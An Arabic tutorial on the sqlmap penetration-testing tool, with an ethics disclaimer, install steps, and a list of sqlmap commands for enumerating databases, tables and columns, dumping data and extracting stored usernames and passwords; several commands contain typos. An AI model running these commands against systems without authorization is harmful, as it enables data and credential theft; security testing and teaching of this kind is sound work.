لمحة عن sqlmap
SQLMap هي أداة قوية تستخدم في اختبار الاختراق واكتشاف الثغرات في قواعد البيانات التي تعتمد على لغة SQL. تعتبر SQLMap أداة مفيدة جدًا لأي مطور ومدير نظام يرغب في ضمان أمان قواعد بياناتهم وتجنب الهجمات الإلكترونية.
كيف تعمل SQLMap؟
SQLMap تستخدم تقنيات الاختراق الآلي لاكتشاف الثغرات في قواعد البيانات. تقوم بتحليل الاستجابات من الخادم وتقوم بفحصها للبحث عن ثغرات محتملة. بالإضافة إلى ذلك، تقوم SQLMap بتوليد تقارير مفصلة تحتوي على المعلومات حول الثغرات التي تم اكتشافها والتوصيات لإصلاحها.
الاستخدام الصحيح لـ SQLMap:
- يجب دائمًا استخدام SQLMap بموافقة صاحب النظام أو الموقع.
- يجب على المستخدمين أن يكونوا على دراية بالقوانين واللوائح المتعلقة بالاختراق والاختراق الأخلاقي.
- يجب تجنب استخدام SQLMap في أي نشاط غير قانوني أو غير أخلاقي.
كيفية الاستخدام
اولاً عليك تثبيت الأداة
لتثبيت الاداة
Kali Linux
sudo apt update
sudo apt install sqlmap -y
Debian-based-
sudo apt update
sudo apt install git python python-pip -y
pip install sqlmap
Termux (Android)
apt update
apt install git python -y
pip install sqlmap
لمسح موقع مصاب مسح كامل
sqlmap -u url --all
لاظهار قواعد البيانات
sqlmap -u url --dbs
لمسح جداول واعمدة قاعدة البيانات
sqlmap -u url -D database --all
لمسح الاسماء المستخدمة وكلمات المرور
sqlmap -u url --batch --passwords
اظهار الجداول
sqlmap -u url -D database --tables
اظهار الاعمدة
sqlmap -u url -D datsbase -T tables --columns
لدخول إلى الاعمدة
sqlmap -u url -D database -T tables -C columnts --dump
لاستعمال اوامر shell
sqlmap --sqlmp-shell
لاستعمال bsnner
sqlmap -u url --banner
فوائد استخدام SQLMap:
- تساعد في اكتشاف الثغرات في قواعد البيانات وتجنب استغلالها من قبل المهاجمين.
- تساعد في تحسين أمان قواعد البيانات وضمان سلامتها.
- توفر تقارير مفصلة تساعد في فهم الثغرات واتخاذ إجراءات لإصلاحها.